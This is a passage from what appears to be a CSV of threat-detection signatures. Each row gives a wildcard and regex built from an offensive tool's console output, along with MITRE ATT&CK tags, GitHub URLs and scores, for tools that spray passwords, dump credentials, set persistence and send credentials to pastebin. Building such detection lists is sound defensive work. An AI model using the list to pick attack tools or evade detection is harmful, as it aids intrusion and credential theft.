- T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\ZipExec -*",".{0,1000}\\ZipExec\s\-.{0,1000}","offensive_tool_keyword","ZipExec","A unique technique to execute binaries from a password protected zip","T1560.001 - T1204.002 - T1059.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Tylous/ZipExec","1","0","N/A","9","10","993","156","2022-07-01T16:25:26Z","2021-10-19T21:03:44Z" "*\ZipExec.exe*",".{0,1000}\\ZipExec\.exe.{0,1000}","offensive_tool_keyword","ZipExec","A unique technique to execute binaries from a password protected zip","T1560.001 - T1204.002 - T1059.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Tylous/ZipExec","1","0","N/A","9","10","993","156","2022-07-01T16:25:26Z","2021-10-19T21:03:44Z" "*\ZipExec.go*",".{0,1000}\\ZipExec\.go.{0,1000}","offensive_tool_keyword","ZipExec","A unique technique to execute binaries from a password protected zip","T1560.001 - T1204.002 - T1059.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Tylous/ZipExec","1","0","N/A","9","10","993","156","2022-07-01T16:25:26Z","2021-10-19T21:03:44Z" "*] - caution! this means that exploit is not fileless*",".{0,1000}\]\s\-\scaution!\sthis\smeans\sthat\sexploit\sis\snot\sfileless.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","CVE-2024-1086 POC","10","10","1898","237","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z" "*] Any passwords that were successfully sprayed have been output to *",".{0,1000}\]\sAny\spasswords\sthat\swere\ssuccessfully\ssprayed\shave\sbeen\soutput\sto\s.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","0","N/A","10","10","1636","362","2023-09-22T22:13:14Z","2016-10-04T23:37:37Z" "*] Attempting to enumerate logged on users on *",".{0,1000}\]\sAttempting\sto\senumerate\slogged\son\susers\son\s.{0,1000}","offensive_tool_keyword","GetLoggedOnUsersRegistry","PoC To enumerate logged on users on a remote system using the winreg named pipe","T1087 - T1018 - T1057","TA0007 - TA0003 - TA0004","N/A","N/A","Lateral Movement - Discovery","https://gist.github.com/RalphDesmangles/22f580655f479f189c1de9e7720776f1","1","0","N/A","8","8","N/A","N/A","N/A","N/A" "*] Bruteforcing %d CLSIDs*",".{0,1000}\]\sBruteforcing\s\%d\sCLSIDs.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","N/A","10","8","767","97","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" "*] Check for ADCS Vulnerabilities*",".{0,1000}\]\sCheck\sfor\sADCS\sVulnerabilities.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*] Cleared all rat command queues!*",".{0,1000}\]\sCleared\sall\srat\scommand\squeues!.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*] Cloning GPO * from fakedc ",".{0,1000}\]\sCloning\sGPO\s.{0,1000}\sfrom\sfakedc\s","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*] compile geacon with the public key from .beacon_keys*",".{0,1000}\]\scompile\sgeacon\swith\sthe\spublic\skey\sfrom\s\.beacon_keys.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*] Completed Privesc Checks in *",".{0,1000}\]\sCompleted\sPrivesc\sChecks\sin\s.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*] DHCP sniffer identified potential spoofing target:*",".{0,1000}\]\sDHCP\ssniffer\sidentified\spotential\sspoofing\starget\:.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","9","2","105","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z" "*] DHCP Sniffer identified previously sniffed name: *",".{0,1000}\]\sDHCP\sSniffer\sidentified\spreviously\ssniffed\sname\:\s.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","9","2","105","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z" "*] Dumping browsers credentials ..*",".{0,1000}\]\sDumping\sbrowsers\scredentials\s\.\..{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","script content","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*] Dumping mail serv credentials ..*",".{0,1000}\]\sDumping\smail\sserv\scredentials\s\.\..{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","script content","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*] Dumping messenger credentials ..*",".{0,1000}\]\sDumping\smessenger\scredentials\s\.\..{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","script content","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*] dumping runtime core memory of the root smart contract*",".{0,1000}\]\sdumping\sruntime\score\smemory\sof\sthe\sroot\ssmart\scontract.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","CVE-2024-1086 POC","10","10","1898","237","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z" "*] Enable Persistence (Y/n): *",".{0,1000}\]\sEnable\sPersistence\s\(Y\/n\)\:\s.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*] Enjoy your creds! Reverting to self*",".{0,1000}\]\sEnjoy\syour\screds!\sReverting\sto\sself.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/leftp/BackupCreds","1","0","N/A","9","1","51","6","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z" "*] Eventviewer Persistence created*",".{0,1000}\]\sEventviewer\sPersistence\screated.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*] executing xss local file write to hijack systemd user*",".{0,1000}\]\sexecuting\sxss\slocal\sfile\swrite\sto\shijack\ssystemd\suser.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","CVE-2024-1086 POC","10","10","1898","237","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z" "*] Extension Hijacking Persistence created*",".{0,1000}\]\sExtension\sHijacking\sPersistence\screated.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*] Fetching LLVM-Obfuscator ?*",".{0,1000}\]\sFetching\sLLVM\-Obfuscator\s\?.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*] Found kerberoastable users: *",".{0,1000}\]\sFound\skerberoastable\susers\:\s.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "*] Found non-ASCII service: *",".{0,1000}\]\sFound\snon\-ASCII\sservice\:\s.{0,1000}","offensive_tool_keyword","PhantomService","Searches for and removes non-ASCII services that can't be easily removed by built-in Windows tools","T1050.005 - T1055.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/PhantomService","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*] going to escalate the quantum privilege of wifi driver*",".{0,1000}\]\sgoing\sto\sescalate\sthe\squantum\sprivilege\sof\swifi\sdriver.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","CVE-2024-1086 POC","10","10","1898","237","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z" "*] going to inject sql payload into the external mainframe smart contract interface*",".{0,1000}\]\sgoing\sto\sinject\ssql\spayload\sinto\sthe\sexternal\smainframe\ssmart\scontract\sinterface.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","CVE-2024-1086 POC","10","10","1898","237","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z" "*] INFO: DLL IS VULNERABLE TO DOWNLOADS INSTALLER TEST-*",".{0,1000}\]\sINFO\:\sDLL\sIS\sVULNERABLE\sTO\sDOWNLOADS\sINSTALLER\sTEST\-.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","9","6","516","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z" "*] INFO: DLL IS VULNERABLE TO EXECUTABLE TEST*",".{0,1000}\]\sINFO\:\sDLL\sIS\sVULNERABLE\sTO\sEXECUTABLE\sTEST.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","9","6","516","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z" "*] Injecting into remote process using direct syscalls*",".{0,1000}\]\sInjecting\sinto\sremote\sprocess\susing\sdirect\ssyscalls.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" "*] Injecting into remote process using direct syscalls*",".{0,1000}\]\sInjecting\sinto\sremote\sprocess\susing\sdirect\ssyscalls.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" "*] Injecting malicious scheduled task into downloaded GPO*",".{0,1000}\]\sInjecting\smalicious\sscheduled\stask\sinto\sdownloaded\sGPO.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*] Kerberoast user * successfully!*",".{0,1000}\]\sKerberoast\suser\s.{0,1000}\ssuccessfully!.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "*] Killing EventLog Threads (if running)*",".{0,1000}\]\sKilling\sEventLog\sThreads\s\(if\srunning\).{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","0","N/A","10","5","452","69","2024-04-19T20:15:04Z","2023-07-24T13:59:16Z" "*] Listing GraphRunner modules?*",".{0,1000}\]\sListing\sGraphRunner\smodules\?.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","#contentstrings","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*] LLMNR sniffer identified potential spoofing target:*",".{0,1000}\]\sLLMNR\ssniffer\sidentified\spotential\sspoofing\starget\:.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","9","2","105","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z" "*] LLMNR Sniffer identified previously sniffed name*",".{0,1000}\]\sLLMNR\sSniffer\sidentified\spreviously\ssniffed\sname.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","9","2","105","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z" "*] Modifying * attribute of GPO on fakedc to *",".{0,1000}\]\sModifying\s.{0,1000}\sattribute\sof\sGPO\son\sfakedc\sto\s.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*] Modifying gPCFileSysPath attribute of GPO on fakedc to *",".{0,1000}\]\sModifying\sgPCFileSysPath\sattribute\sof\sGPO\son\sfakedc\sto\s.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*] Password spraying has begun with *",".{0,1000}\]\sPassword\sspraying\shas\sbegun\swith\s.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","0","N/A","10","10","1636","362","2023-09-22T22:13:14Z","2016-10-04T23:37:37Z" "*] Password spraying is complete*",".{0,1000}\]\sPassword\sspraying\sis\scomplete.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","0","N/A","10","10","1636","362","2023-09-22T22:13:14Z","2016-10-04T23:37:37Z" "*] Powershell Persistence created*",".{0,1000}\]\sPowershell\sPersistence\screated.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*] Received DCOM NTLM type 3 authentication from the privileged client*",".{0,1000}\]\sReceived\sDCOM\sNTLM\stype\s3\sauthentication\sfrom\sthe\sprivileged\sclient.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*] Screensaver Persistence created*",".{0,1000}\]\sScreensaver\sPersistence\screated.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*] Sending credentials to pastebin ..*",".{0,1000}\]\sSending\scredentials\sto\spastebin\s\.\..{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","script content","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*] sending network-based smb hypertrojan with credentials*",".{0,1000}\]\ssending\snetwork\-based\ssmb\shypertrojan\swith\scredentials.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","CVE-2024-1086 POC","10","10","1898","237","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z" "*] Shellcode Decryption Started*",".{0,1000}\]\sShellcode\sDecryption\sStarted.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","0","N/A","10","5","452","69","2024-04-19T20:15:04Z","2023-07-24T13:59:16Z" "*] Spoofing gPLink to *",".{0,1000}\]\sSpoofing\sgPLink\sto\s.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*] Starting agent node actively.Connecting to *Reconnecting every * seconds*",".{0,1000}\]\sStarting\sagent\snode\sactively\.Connecting\sto\s.{0,1000}Reconnecting\severy\s.{0,1000}\sseconds.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*] Starting GraphSpy. Open in your browser by going to the url displayed below.*",".{0,1000}\]\sStarting\sGraphSpy\.\sOpen\sin\syour\sbrowser\sby\sgoing\sto\sthe\surl\sdisplayed\sbelow\..{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1190 - T1133 - T1071 - T1082 - T1566.002","TA0001 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/RedByte1337/GraphSpy","1","0","N/A","7","4","346","39","2024-04-17T19:18:08Z","2024-02-07T19:47:15Z" "*] Starting nullinux setup script*",".{0,1000}\]\sStarting\snullinux\ssetup\sscript.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","0","N/A","7","6","551","100","2022-08-12T01:56:15Z","2016-04-28T16:45:02Z" "*] Starting RogueOxidResolver RPC Server listening on port*",".{0,1000}\]\sStarting\sRogueOxidResolver\sRPC\sServer\slistening\son\sport.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*] Starting share enumeration with thread limit of *",".{0,1000}\]\sStarting\sshare\senumeration\swith\sthread\slimit\sof\s.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","0","N/A","9","1","29","6","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z" "*] Starting the NTLM relay attack, launch ntlmrelayx on *",".{0,1000}\]\sStarting\sthe\sNTLM\srelay\sattack,\slaunch\sntlmrelayx\son\s.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*] Starting the RPC server to capture the credentials hash from the user authentication!!*",".{0,1000}\]\sStarting\sthe\sRPC\sserver\sto\scapture\sthe\scredentials\shash\sfrom\sthe\suser\sauthentication!!.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*] Startup Persistence created*",".{0,1000}\]\sStartup\sPersistence\screated.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*] TARGET DLL IS NOT VULNERABLE TO 